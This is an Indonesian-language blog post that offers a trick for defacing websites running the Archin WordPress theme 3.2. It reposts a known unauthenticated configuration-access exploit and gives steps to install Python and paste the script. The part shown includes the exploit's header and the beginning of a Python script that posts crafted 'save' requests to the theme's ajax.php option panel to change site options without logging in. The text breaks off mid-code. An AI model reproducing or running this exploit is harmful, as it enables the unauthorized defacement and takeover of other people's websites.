Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability
Selamat datang di blog IDCA :D langsung saja deh, neh saya share trik Deface "Wordpress Theme Archin", tapi karena saya males ngetik jadi saya copas aja blognya si Mr Xenophobic. Ijin ya om XD XD ok lanjut. berikut tool yang dibutuhkan : Python install Python, setelah selesai menginstall python, buka notepad dan paste script berikut : # Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access # Date: Sept 29, 2012 # Exploit Author: bwall (@bwallHatesTwits) # Vendor Homepage: http://themeforest.net/user/wptitans # Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432 # Version: 3.2 # Tested on: Ubuntu import httplib, urllib #target site site = " target website " # path to ajax.php url = "/wp-content/themes/yvora/hades_framework/option_panel/ajax.php" def ChangeOption(site, url, option_name, option_value): params = urllib.urlencode({'action': 'save', 'values[0][name]': opt...